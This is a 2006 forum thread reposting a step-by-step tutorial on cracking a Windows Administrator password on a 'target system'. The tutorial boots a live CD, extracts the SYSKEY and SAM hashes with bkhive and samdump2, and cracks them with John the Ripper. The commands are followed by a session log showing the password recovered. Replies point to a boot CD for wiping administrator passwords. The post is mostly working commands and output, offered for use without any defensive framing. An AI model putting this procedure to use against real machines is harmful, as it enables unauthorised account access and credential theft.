Jump to content


Photo

Cracking windows Administrator password


  • Please log in to reply
3 replies to this topic

#1 Ratna

Ratna

    Newbie

  • Members
  • Pip
  • 39 posts

Posted 13 September 2006 - 07:15 AM

/* Tutorial By: IronGeek*/



Step 1. Download the Auditor Boot CD ISO and burn it to a CD-R. All of the tools we will be using in this tutorial come on the Auditor Boot CD.

Step 2. Insert the Auditor Boot CD into the target system, reboot and set the CD-ROM as the first boot device in the BIOS. Some systems let you hold down a certain function key at startup to choose what media to boot from (on recent Dellís itís F12).

Step 3. Auditor will begin to boot and ask you what screen resolution you want to use. Choose a resolution that your monitor and video card will support (I use 2 for 1024x768) then hit enter.

Step 4. When Auditor finishes booting click on the icon on the KDE bar for a new terminal window (it looks like a little monitor). Below you will see the commands you will have to use to get past SysKey, extract the hashes and attempt to crack the password hashes.

Step 5. Mount the local hard disk, most likely hda1:
Linux Command:

mount /dev/hda1


Step 6. Change the present working directory to the ramdisk so we space to work with the files we will be creating:
Linux Command:

cd /ramdisk/


Step 7. Auditor comes with Ncuomoís Samdump2 and Bkhive [6]. We will be using these tools to extract the system key from the System hive and the password hashes from the SAM file. To get the system key we need to use the Bkhive on our SYSTEM file (most likely in C:\WINDOWS\system32/config\SYSTEM, thatís where it is on my XP Pro test box, on some systems it will me in C:\WINNT\system32/config\SYSTEM or perhaps some other drive entirely). By the way, if for some reason you are running NT4 SP3 you will need to use Bkreg instead, all later system (NT4 SP4, 2000 and XP) use Bkhive. To grab the system key and put it into a file we use the following command:
Linux Command:

bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt


Step 8. Now that we have the system key we can use it to undo SysKey on the SAM, extract the hashes and place them into a PWDump format file:
Linux Command:

samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes.txt


Step 9. At this point we have a PWDump format file called password-hashes.txt that we could copy off of the system and import into L0phtcrack [7] or Cain [8] (see the old tutorial for details). Since I said we were going to do it all with the Auditor CD and Open Source tools we will use John the Ripper to crack the hashes, but before we can use John we have to extract one of the many wordlists that comes with Auditor. Take a look on the CD in /opt/auditor/full/share/wordlists/ for all of the different wordlists you can use, Iíll use english.txt for this tutorial. To extract english.txt to the ramdisk use the following command:
Linux Command:

gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt


Step 10. Now that everything is in place we can run John with a simple dictionary attack to see if we can crack any of the hashes:
Linux Command:

john password-hashes.txt -w:eng.txt


John detects that the dump file has LM (LAN Manager) hashes in it and chooses the format ďNT LM DES [32/32 BS]Ē automatically. If I had disabled the storing of LM hashes in the SAM I might want to use the Ėf option to specify the NT hash format and try to crack the NT hashes instead. To do that I would use the following command:
Linux Command:

john password-hashes.txt -f:NT -w:eng.txt


If dictionary attacks arenít working and you have a lot of time (as well as a fast computer) you can try Johnís incremental (brute force) mode and see if it gives you better results:
Linux Command:

john password-hashes.txt -i:all


Incremental mode is limited to only eight characters unless you change the source before you compile it, but at more than eight characters you will likely be waiting a very long time for John to finish. Doing more that eight characters is pointless anyway if you have the LM hashes since there are stored as two seven byte parts (NT hashes are a different story and can be harder to crack).

In case you were wondering what all of these commands would look like along with their output here is a copy of my session log that may help you understand how they all work together (notice that the password for the Administrator account is ďmonkeyĒ):
Session Log saved from Auditor CD:

root@1[~]# mount /dev/hda1
root@1[~]# cd /ramdisk/
root@1[ramdisk]# bkhive-linux /mnt/hda1/WINDOWS/system32/config/system saved-syskey.txt
Bkhive ncuomo@studenti.unina.it

Bootkey: 407af4376e55f1fd6d58cc47a4fa4c01
root@1[ramdisk]# samdump2-linux /mnt/hda1/WINDOWS/system32/config/sam saved-syskey.txt>password-hashes
.txt
Samdump2 ncuomo@studenti.unina.it
This product includes cryptographic software written
by Eric Young (eay@cryptsoft.com)

No password for user Guest(501)
No V value!
root@1[ramdisk]# gunzip -c /opt/auditor/full/share/wordlists/english/english.txt.gz> /ramdisk/eng.txt
root@1[ramdisk]# john password-hashes.txt -w:eng.txt
Loaded 3 password hashes with no different salts (NT LM DES [32/32 BS])
MONKEY (Administrator)
guesses: 1 time: 0:00:00:03 100% c/s: 1622943 trying: ZZYZX - ZZZZZZZ
root@1[ramdisk]# john password-hashes.txt -f:NT -w:eng.txt
Loaded 2 password hashes with no different salts (NT MD4 [TridgeMD4])
monkey (Administrator)
guesses: 1 time: 0:00:00:12 100% c/s: 464435 trying: zzzzzzzzzzzzzzzzzzzzzz
root@1[ramdisk]#

PROGRAMMERS ARE ARTISTS

#2 ujjwal

ujjwal

    WNSO International Co-ordination Committee

  • ICC
  • PipPipPip
  • 391 posts

Posted 13 September 2006 - 11:45 AM

nice 1 .. but its a very long method ... I have a small bootable CD ... just to make the administrator password disappear ???

much easier wink.gif
//,,
(,")> Let me think
<( )' about that...
,,J L,,

#3 Ratna

Ratna

    Newbie

  • Members
  • Pip
  • 39 posts

Posted 14 September 2006 - 04:23 AM

QUOTE(ujjwal @ Sep 13 2006, 11:45 AM) View Post

nice 1 .. but its a very long method ... I have a small bootable CD ... just to make the administrator password disappear ???

much easier wink.gif


Can you tell me this process in some details?
I will be thankful for this.
Thanks
PROGRAMMERS ARE ARTISTS

#4 ujjwal

ujjwal

    WNSO International Co-ordination Committee

  • ICC
  • PipPipPip
  • 391 posts

Posted 19 September 2006 - 05:24 AM

QUOTE(Ratna @ Sep 14 2006, 08:23 AM) View Post

QUOTE(ujjwal @ Sep 13 2006, 11:45 AM) View Post

nice 1 .. but its a very long method ... I have a small bootable CD ... just to make the administrator password disappear ???

much easier wink.gif


Can you tell me this process in some details?
I will be thankful for this.
Thanks


here
http://chautari.wnso...?showtopic=9816

Hiren's Boot CD.. it has all the tools you need. Plus it has password reseting tool as well.

Very useful .
//,,
(,")> Let me think
<( )' about that...
,,J L,,




1 user(s) are reading this topic

0 members, 1 guests, 0 anonymous users